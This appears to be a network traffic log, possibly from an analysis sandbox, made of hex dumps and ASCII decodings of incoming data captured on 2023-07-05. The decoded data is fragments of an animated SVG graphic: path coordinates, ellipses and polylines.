                                                                                                                                                                                                                                                                          2023-07-05 06:07:20 UTC1588INData Raw: 31 2c 39 31 2e 39 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 35 35 22 20 64 3d 22 4d 38 32 37 2e 35 34 2c 38 36 2e 31 63 2d 2e 31 34 2d 31 2e 36 2d 2e 37 39 2d 33 2e 37 39 2d 32 2e 38 32 2d 32 2e 36 31 41 31 2e 34 2c 31 2e 34 2c 30 2c 30 2c 30 2c 38 32 34 2c 38 35 63 30 2c 32 2e 34 33 2e 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 1,91.9Z"/><path class="cls-155" d="M827.54,86.1c-.14-1.6-.79-3.79-2.82-2.61A1.4,1.4,0,0,0,824,85c0,2.43.67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2965INData Raw: 31 37 2e 39 32 63 2d 2e 31 38 2c 30 2d 34 39 2e 31 32 2c 31 34 2e 31 36 2d 35 38 2e 35 37 2c 31 38 2e 36 2d 37 2e 31 33 2c 33 2e 33 35 2d 31 38 2e 37 33 2c 35 2e 34 33 2d 32 36 2c 38 2e 33 35 2d 34 2e 34 35 2d 2e 39 32 2d 32 33 2e 37 31 2d 36 2e 36 35 2d 32 36 2e 34 37 2d 39 2e 34 35 2c 30 2c 30 2d 31 33 2e 35 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38
                                                                                                                                                                                                                                                                          Data Ascii: 17.92c-.18,0-49.12,14.16-58.57,18.6-7.13,3.35-18.73,5.43-26,8.35-4.45-.92-23.71-6.65-26.47-9.45,0,0-13.5-3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2981INData Raw: 73 6c 61 74 65 28 34 37 2e 31 33 20 35 36 33 2e 32 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 32 35 22 20 63 79 3d 22 32 31 33 2e 37 31 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e
                                                                                                                                                                                                                                                                          Data Ascii: slate(47.13 563.29) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.25" cy="213.71" rx="0.15" ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="tran
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC2997INData Raw: 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 39 33 20 35 35 30 2e 33 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 34 38 22 20 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20
                                                                                                                                                                                                                                                                          Data Ascii: "0.22" transform="translate(28.93 550.36) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.48" cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3013INData Raw: 34 2d 2e 35 32 2c 30 2d 31 2e 35 32 2e 31 33 2d 32 2e 30 36 2e 32 32 2d 2e 39 31 2e 37 33 2d 31 2e 37 33 2e 38 37 2d 32 2e 36 36 6c 2e 31 32 2e 30 36 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 53 56 47 2d 66 61 64 65 20 34 73 20 65 61 73 65 20 30 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e
                                                                                                                                                                                                                                                                          Data Ascii: 4-.52,0-1.52.13-2.06.22-.91.73-1.73.87-2.66l.12.06" style="display: block; animation: SVG-fade 4s ease 0s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3029INData Raw: 20 32 30 30 2e 35 38 20 36 31 30 2e 36 34 20 32 30 36 2e 30 34 20 36 31 30 2e 38 35 20 32 31 32 2e 37 34 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 37 31 20 32 32 31 2e 31 37 20 35 39 30 2e 31 38 20 32 32 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37
                                                                                                                                                                                                                                                                          Data Ascii: 200.58 610.64 206.04 610.85 212.74"></polyline><polyline class="cls-53" points="577.71 221.17 590.18 225.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3045INData Raw: 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 53 56 47 2d 66 61 64 65 20 32 73 20 65 61 73 65 20 30 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ="display: block; animation: SVG-fade 2s ease 0s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3061INData Raw: 30 2c 2e 34 39 73 30 2c 2e 33 35 2c 30 2c 2e 34 37 68 30 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 2e 37 31 2d 2e 38 31 2c 31 2e 37 36 2c 31 2e 37 36 2c 30 2c 30 2c 31 2c 31 2d 2e 33 31 2c 31 2e 38 37 2c 31 2e 38 37 2c 30 2c 30 2c 31 2c 2e 34 35 2c 30 6c 30 2c 31 61 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a
                                                                                                                                                                                                                                                                          Data Ascii: 0,.49s0,.35,0,.47h0a1.92,1.92,0,0,1,.71-.81,1.76,1.76,0,0,1,1-.31,1.87,1.87,0,0,1,.45,0l0,1a2.12,2.12,0,0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3077INData Raw: 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 33 34 2c 32 30 38 2e 36 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61
                                                                                                                                                                                                                                                                          Data Ascii: path class="cls-4" d="M700.34,208.66a1.71,1.71,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.41,2.41,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3093INData Raw: 22 20 64 3d 22 4d 37 33 31 2e 38 31 2c 33 30 34 2e 37 37 41 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2c 37 33 31 2c 33 30 37 61 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: " d="M731.81,304.77A1.73,1.73,0,0,1,731,307a2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3109INData Raw: 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 3,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3125INData Raw: 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 38 38 2c 32 39 36 2e 31 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38
                                                                                                                                                                                                                                                                          Data Ascii: 1-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M780.88,296.17a1.72,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M78
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3141INData Raw: 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 37 33 2c 31 39 38 2e 33 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.15,2.86"></path><path class="cls-4" d="M798.73,198.39a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3157INData Raw: 64 3d 22 4d 38 33 30 2e 31 39 2c 32 39 34 2e 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 35 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: d="M830.19,294.5a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.95,2.38,2.38,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3173INData Raw: 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: .72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3189INData Raw: 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70
                                                                                                                                                                                                                                                                          Data Ascii: ,0,1-3.34-.94,2.41,2.41,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></p
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3205INData Raw: 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 37 2e 31 32 2c 31 38 38 2e 31 32 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M897.12,188.12a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:34 UTC3221INData Raw: 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 35 38 2c 32 38 34 2e 32 33 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 